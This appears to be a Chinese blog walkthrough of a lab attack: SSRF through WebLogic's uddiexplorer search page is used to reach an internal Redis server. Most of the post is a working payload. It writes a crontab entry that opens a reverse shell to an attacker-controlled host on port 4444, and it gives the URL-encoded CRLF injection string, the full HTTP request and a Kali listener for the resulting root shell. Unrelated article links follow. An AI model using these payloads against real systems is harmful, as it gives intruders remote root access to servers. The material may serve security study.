-
web-logic-ssrf内网渗透
打开浏览页面
268494e2d802db62cf5a6f886.png)burpsuite截获数据
redis指令URL编码
set 1 “\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c ‘sh -i >& /dev/tcp/192.168.20.228/4444 0>&1’\n\n\n\n”
config set dir /etc/
config set dbfilename crontab
save
增加换行编码:换行符是“\r\n”,也就是“%0D%0A
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.43.17%2F5555%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
poc数据
operator=http://192.168.20.195:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.20.228%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa&rdoSearch=name&txtSearchname=dd&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.20.195:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.20.228%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
向redius服务器置入反弹数据
kali上开启监听反弹
在这里插入图片描述
运行监听
查看系统权限
-
相关阅读:
Elasticsearch:基于 Langchain 的 Elasticsearch Agent 对文档的搜索
[JVM]问下,对象在堆上的内存分配是怎样的
Nagios自定义插件的编写规范
【HTML】HTML网页设计---叮当猫网页设计
【STM32】STM32学习笔记-修改主频 睡眠模式 停止模式 待机模式(45)
CAS:851113-28-5 (生物素-ahx-ahx-酪胺)
Linux Mysql使用【mysqldump】备份数据库结构及数据
Java输入输出流
Smart Document Control——杜绝文件成堆和文件混乱,保证业务连续性,创建企业新阶段
基于python实现Web自动化测试(selenium)、API自动化测试(requests)&附学习视频
- 原文地址:https://blog.csdn.net/qq_40168905/article/details/127678777